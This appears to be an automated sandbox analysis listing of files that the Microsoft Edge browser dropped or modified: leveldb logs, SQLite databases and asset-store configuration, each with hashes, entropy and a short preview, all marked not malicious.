                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...m.................DB_VERSION.1
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):313
                                                                                                                                                                Entropy (8bit):5.256535054457292
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR1FR1cNwi23oH+Tcwtp3hBtB2KLl5vRrwQ+q2PcNwi23oH+Tcwtp3hBWsIF2:7h/ZYebp3dFLpwVvLZYebp3eFUv
                                                                                                                                                                MD5:3B094BBDBBDF197E8B028B87975DC3FB
                                                                                                                                                                SHA1:73417DF29BB9AC6445FF72891623B7D30E1CFC47
                                                                                                                                                                SHA-256:0C82791A9D3B8DC11A683B931F6BD43EAA288D7B3040EE840FB9374B8001FE8D
                                                                                                                                                                SHA-512:0A439EF23DD135A2E93680E5884B87A333DBACB94836FFF2B0CB3F95CC168FA6CBD9AC91D5A02EC0AA980F8B215AC3E84A5F462E69B2DABAB5FBC08B450711C5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.100 8b8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/09-08:42:34.124 8b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1696115
                                                                                                                                                                Entropy (8bit):5.04061995892176
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:krf76gGkISshcFdmcOAoPENUpifYP+MbI2T:krfgAmmE
                                                                                                                                                                MD5:19D48FDE29D2BCAA232830EEF9C501D2
                                                                                                                                                                SHA1:34513FA65FCA3DE8218C746A0029BA2FED3EBBB4
                                                                                                                                                                SHA-256:C506A8D682F7D5B85E6F3F007FC1C49EBAADBF2558AB62183C69697E8D49BD8D
                                                                                                                                                                SHA-512:417B84A577AE59E80CD51E0280666B89F2078B57B60DBA751994A83890BB2958D453CBB93CC2981B84AC3A194AA29C16BA12284F3AF883488BDF77A52D29E8FE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.138348861281795
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvROU8jN4q2PcNwi23oH+Tcwt9Eh1tIFUtJvRoMJZmwPvRrMDkwOcNwi23oH+8:7XvLZYeb9Eh16FUtoe/g54ZYeb9Eh1VJ
                                                                                                                                                                MD5:8C56ED736F9FE9282E20801DF6CE97BC
                                                                                                                                                                SHA1:784468A2CC9F7590BF6534113B1747F5BF35607C
                                                                                                                                                                SHA-256:0BCE4C010D0F9D405E5BF341E7555B1D68761F12C2213F01C9A0992939915F91
                                                                                                                                                                SHA-512:BD8FB98E716CCC1AAE0798181017E2B4521E79006699580EDE350E7685F5190AB8BBF681DB2AD69BC4570CF7B72A2088E245C6B0FD078EC62544BB9C738A716C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.212 1fd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:42:34.516 1fd0 Recovering log #3.2025/01/09-08:42:34.522 1fd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.138348861281795
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvROU8jN4q2PcNwi23oH+Tcwt9Eh1tIFUtJvRoMJZmwPvRrMDkwOcNwi23oH+8:7XvLZYeb9Eh16FUtoe/g54ZYeb9Eh1VJ
                                                                                                                                                                MD5:8C56ED736F9FE9282E20801DF6CE97BC
                                                                                                                                                                SHA1:784468A2CC9F7590BF6534113B1747F5BF35607C
                                                                                                                                                                SHA-256:0BCE4C010D0F9D405E5BF341E7555B1D68761F12C2213F01C9A0992939915F91
                                                                                                                                                                SHA-512:BD8FB98E716CCC1AAE0798181017E2B4521E79006699580EDE350E7685F5190AB8BBF681DB2AD69BC4570CF7B72A2088E245C6B0FD078EC62544BB9C738A716C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.212 1fd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:42:34.516 1fd0 Recovering log #3.2025/01/09-08:42:34.522 1fd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                Entropy (8bit):0.4623003148432934
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBup6:TouQq3qh7z3bY2LNW9WMcUvBuQ
                                                                                                                                                                MD5:36941194B86933BEF948FACDAE65B45B
SHA1:0F440776FE06DF75AD887E553F783A6EC15D94B8
SHA-256:458FC34E9B8636037826A7F29B6F340252124FA82ADAD2C6B41BDBFC987A05C4
SHA-512:F9C6D9F5AD246F60926EE3E0B8C8EA43A35438ACBCF618E4AC32D17286732C4746971E4EE4ED1B3CC197EB1FE456E7DAB09FE204423536963F39E2ABD328C701
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:dropped
Size (bytes):10240
Entropy (8bit):0.8708334089814068
Encrypted:false
SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:92F9F7F28AB4823C874D79EDF2F582DE
SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):354
Entropy (8bit):5.225258718422697
Encrypted:false
SSDEEP:6:iOrvRglUdSQL+q2PcNwi23oH+TcwtnG2tMsIFUtJvRg+HG1ZmwPvRg+HQLVkwOcK:7Wl1vLZYebn9GFUtgF1/q154ZYebn95J
MD5:8C25F520F44647171FF64A7150DC4C4B
SHA1:9C10264A15530FE649236B861AD75DF60A9D0B87
SHA-256:B071D04A25F19EFAEA31CF62F4F8DDC9C3066621C099C67504EF624D4FE5D38C
SHA-512:5DACDDEC86274DC675F030658D459AC896EBBDB978939E9C92482E79401F181118618D216F21072A010787C91DF8E598D33DD53DE439D7DBA318DE1DF635F13C
Malicious:false
Preview:2025/01/09-08:42:28.161 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:42:28.162 1838 Recovering log #3.2025/01/09-08:42:28.162 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):354
Entropy (8bit):5.225258718422697
Encrypted:false
SSDEEP:6:iOrvRglUdSQL+q2PcNwi23oH+TcwtnG2tMsIFUtJvRg+HG1ZmwPvRg+HQLVkwOcK:7Wl1vLZYebn9GFUtgF1/q154ZYebn95J
MD5:8C25F520F44647171FF64A7150DC4C4B
SHA1:9C10264A15530FE649236B861AD75DF60A9D0B87
SHA-256:B071D04A25F19EFAEA31CF62F4F8DDC9C3066621C099C67504EF624D4FE5D38C
SHA-512:5DACDDEC86274DC675F030658D459AC896EBBDB978939E9C92482E79401F181118618D216F21072A010787C91DF8E598D33DD53DE439D7DBA318DE1DF635F13C
Malicious:false
Preview:2025/01/09-08:42:28.161 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:42:28.162 1838 Recovering log #3.2025/01/09-08:42:28.162 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.613323288685216
Encrypted:false
SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jWMup3qmL:TO8D4jJ/6Up+qD
MD5:633E508C7C7CC747FF26B902FFC616AA
SHA1:D984EC7FA8DD9C278A0CFA4DE18B5B77F43C07A5
SHA-256:82512CAA7CBAD55BAA1A79A2C33AE1E23BB9AC386DD00CE69574EDC5A448386F
SHA-512:FEEC00A7E67C95E4EF69E4C1406D0E0603B724BEBDF2A80117E34CE66967F83F213E0791D1854AB1204A72624CCF92A0E4F59C7293C8F8419F0702A63977393F
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):375520
Entropy (8bit):5.354126940671263
Encrypted:false
SSDEEP:6144:dA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:dFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:AC83B77A1415847FA874341CF1D7A264
SHA1:EB3AE0722BD7B2F2927A694D53388686B8B703AA
SHA-256:B882469B8F9FB4189CE2BD5AA56C9E2F27091EA14A4327D78B19C1BD945973BD
SHA-512:8DE3D3AAF54CB026DDA6C3F7F9824D7018FBF336F79546953919C7684567377DB09FD8C080F19CDEEA8A70A8623921CF5D2A7D6B28E76DF9FB80C3225B6A1BC8
Malicious:false
Preview:...m.................DB_VERSION.1..".q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380903755639689..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):315
Entropy (8bit):5.18682367848329
Encrypted:false
SSDEEP:6:iOrvR3V81cNwi23oH+Tcwtk2WwnvB2KLl5vRKWT+q2PcNwi23oH+Tcwtk2WwnvIg:7JVGZYebkxwnvFLvT+vLZYebkxwnQFUv
MD5:CDF559A5A9E57D9DD276EF9EE07C15FB
SHA1:F14E663C6401A26E08BE165B87F2BEF5B9077647
SHA-256:7D8458AA1C9AFDE6E3E4344F6EDC69F30F693BF742F0C3BDCB88060D95725B06
SHA-512:BE3C7C7138D70FAA684934FBB0E6CAE30F577C2692AE9DB903E2DBF960E0D1ECD935335FCE4A15C6B56A87000ED73F59E7DF4DB7C230625EF0B197341A931CE7
Malicious:false
Preview:2025/01/09-08:42:34.141 94c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-08:42:34.641 94c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):358860
Entropy (8bit):5.3246096299140815
Encrypted:false
SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RY:C1gAg1zfvA
MD5:FBCFCCFEBBF6C36E01A29D109E743A2D
SHA1:68E64AD91482303E4710B838AFD4BC383441676E
SHA-256:34A205B115F5D803966AB0F2D797AE9E1FC794A9BC771F20B168D60B24F87061
SHA-512:F0AFDDA2B8DD1BA703C02E113D1E71BC13F3098ACC18C04899BE669D70B9DEFCB90A8D276F992DD0332CE76A1E5A69DADD6EECBCA3AE09C2287DFD9C47FD1AD2
Malicious:false
Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):418
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:BF097D724FDF1FCA9CF3532E86B54696
SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):330
                                                                                                                                                                Entropy (8bit):5.182624272590532
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRg+lNAVq2PcNwi23oH+Tcwt8aPrqIFUtJvRgSAgZmwPvRgSAIkwOcNwi23oD:7WqOvLZYebL3FUtgs/qM54ZYebQJ
                                                                                                                                                                MD5:651B276236C93614740E7BBDC953C68A
                                                                                                                                                                SHA1:74AAD571816B61E85838A21E50C2D40D1368359A
                                                                                                                                                                SHA-256:5E3D53A2372775DBA2F043DED2B166B7B7B56FEEB0DE62ED62D9FF7A35810618
                                                                                                                                                                SHA-512:1EA89E46727A1BCEFE513BADA648F6E8D349D819916D5793C4CFBD9B55086DBA893A0759F1D508DF2B4D633D3EC093B8C8D67B9108D78C7BCFADD1EB6876E036
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.162 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:42:28.164 1dd0 Recovering log #3.2025/01/09-08:42:28.164 1dd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.207762769342074
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR3vAVq2PcNwi23oH+Tcwt865IFUtJvRFF0NAgZmwPvRFAIkwOcNwi23oH+TT:7KvLZYeb/WFUt4/L54ZYeb/+SJ
                                                                                                                                                                MD5:81CB774D67126009136599D3CB6653E1
                                                                                                                                                                SHA1:D76C70E44830AF2DB8C55DC25F6BDB6E22A03FE9
                                                                                                                                                                SHA-256:C5617F214DE2FF4D501964DB2B8AEA375EA7FC49326FF1C38C94D8F2C93F79F4
                                                                                                                                                                SHA-512:54643732DABA48B40A8B7ECA159BE4031ACDB41F1FD29C1F2B06B30B11275F71859783C454FF5A1728A219B294C3DD90191F8752117FBD28CF159255DBA4B8C9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.175 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:42:28.176 1dd0 Recovering log #3.2025/01/09-08:42:28.177 1dd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.162867780125177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREgs+Vq2PcNwi23oH+Tcwt8NIFUtJvREgsgZmwPvREgsIkwOcNwi23oH+TcN:7mF6vLZYebpFUtEq/SW54ZYebqJ
                                                                                                                                                                MD5:E9D09C8D55CB4A6B6AE21BC74D753BB8
                                                                                                                                                                SHA1:CCC79599AA50F020A90F6562CCE443CF90E6D400
                                                                                                                                                                SHA-256:81CB2D092CDE6E24E68EFA9D66E09676577AA7CA8F4AC061DBF681E6B4C9D2DD
                                                                                                                                                                SHA-512:2024C369AAF192BA29832D8AC0E940CBC5C0EACABBFEE2756814CEC12ECA9077AAFE73DF8600DD812292AC9C8B90ABEE023E2F8AB9E346DD27552C0DCFC052CB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.121 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:42:29.122 680 Recovering log #3.2025/01/09-08:42:29.122 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):429
                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                Malicious:false
